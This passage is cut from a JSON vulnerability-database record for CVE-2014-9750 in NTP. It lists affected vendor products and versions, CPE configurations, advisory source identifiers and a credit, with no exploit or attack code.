0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.20:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.11:" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "flex system chassis management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nsm series appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01:" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p24l compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.10:" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "security proventia network multi-function security system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.214" }, { "model": "network time protocol 4.2.7p11", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "flex system p270 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.00:" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.24" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.00:" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "nsmxpress 2012.2r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00:" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.213" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.11:" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "flex system p270 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.10:" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.113" }, { "model": "videoscape back office", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "ds8700 r6.3 sp9", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "flex system p24l compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "783.20:" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "flex system p24l compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01:" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "flex system p460 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.11:" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "ucs invicta series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "783.20:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.0" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.11:" }, { "model": "flex system p460 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.00:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.01:" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "ds8870 r7.2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p270 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.01:" }, { "model": "flex system p460 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.20:" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.7" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.8" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system p460 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.00:" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "flex system p460 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.20:" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "webex social", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "flex system p24l compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.11:" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "flex system p460 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.11:" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "flex system p270 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.20:" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.20:" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.10:" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.16.00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.34" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "flex system p460 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.10:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.01:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.1.0" }, { "model": "network time protocol 4.2.8p1", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "flex system p460 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.01:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "flex system p460 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.10:" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network time protocol 4.2.7p230", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "flex system p270 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.11:" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.38.00" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.10:" }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.00:" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ds8800 r6.3 sp9", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p460 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.01:" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "nsm server software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "flex system p24l compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00:" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.10:" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "72583" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-9750" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Harlan Stenn", "sources": [ { "db": "BID", "id": "72583" } ], "trust": 0.3 }, "cve": "CVE-2014-9750", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": 